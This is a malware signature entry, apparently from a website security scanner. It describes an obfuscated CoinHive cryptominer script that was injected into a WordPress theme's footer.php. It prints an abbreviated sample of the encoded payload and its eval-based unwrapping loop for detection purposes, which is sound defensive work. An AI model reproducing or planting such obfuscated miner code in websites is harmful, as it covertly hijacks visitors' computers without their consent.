SiteCheck Signatures


malware.cryptominer.11

Description:
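This is one of many obfuscated CoinHive JavaScript miner injections. Obfuscation of this kind usually means the miner was added without the webmaster's consent. This variant is obfuscated with the Hivelogic Enkoder: the payload is stored as an encoded string that the closing `while(x=eval(x));` loop unwraps layer by layer, so that loop after a long `var x="function f(x){...` string is the recognisable marker. The excerpt below is abbreviated where it says "skipped".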

< script type="text/javascript">
//<![CDATA[
<!--
var x="function f(x​){var i,o="",l=x.length;for(i=0;i<l;i+=2) {if(i+1<l)o+=" +
"x.charAt(i+1);try{o+=x.charAt(i);}catch(e){}}return o;}f("ufcnitnof x({)av" +
" r,i=o\"\"o,=l.​xelgnhtl,o=;lhwli​(e.xhcraoCedtAl​(1/)3=!84{)rt{y+xx=l;=+;" +
"lc}tah​ce({)}}of(r=i-l;1>i0=i;--{)+ox=c.​ahAr(t)i};erutnro s.buts​(r,0lo;)f}\" +
""(1),9\"\\\\V\\​\\P\\KC3V02\\\\26\\04\\01\\\\26\\" +
"00\\00\\\\21\\0N\\\\\\\\\\21​00\\\\0/00\\\\.&05\\"+
..skipped...
"N9\\t4\\00\\\\O**421\\03\\02\\\\A900\\0%\\B636\\04\\"+
"-/00\\0\\\\\\\\Z\\31\\0>\\BP0L02\\\\27\\06\\01\\\"+
"\\\r&\\202203\\\\<t>.36\\0;\\<=21\\0q\\*'m kq,8.&e+\\6\" +
"\\"4\\4503\\\\bQ`O05\\0N\\​QIUE0F01\\\\n]lC21\\0Z\\E]IY" +
"7Z00\\\\33\\00\\03\\\\07\\0x\\HP17\\0N\​svy3smvqy~;v{q?" +
...skipped...
"\\\27\\03\\02\\\\6M02\\\\17\\05\\00\\\\+23>\\?(\""+
"}fo;n uret​}r);+)y+^(i)t(eAodrCha​.c(xdeCoarChomfrg​.intr=So+7;12%={y+)i+l;i<0" +
";i=r(foh;gten.l=x,l\"\\\"\\o=i,r va){,y(x fontincfu)\"")"         ;
while(x=eval​(x));
//-->
//]]>
< /script>

We found this code at the bottom of the active WordPress theme's footer.php file.

Affecting: Mostly WordPress sites.

Mitigation: How to clean a hacked WordPress site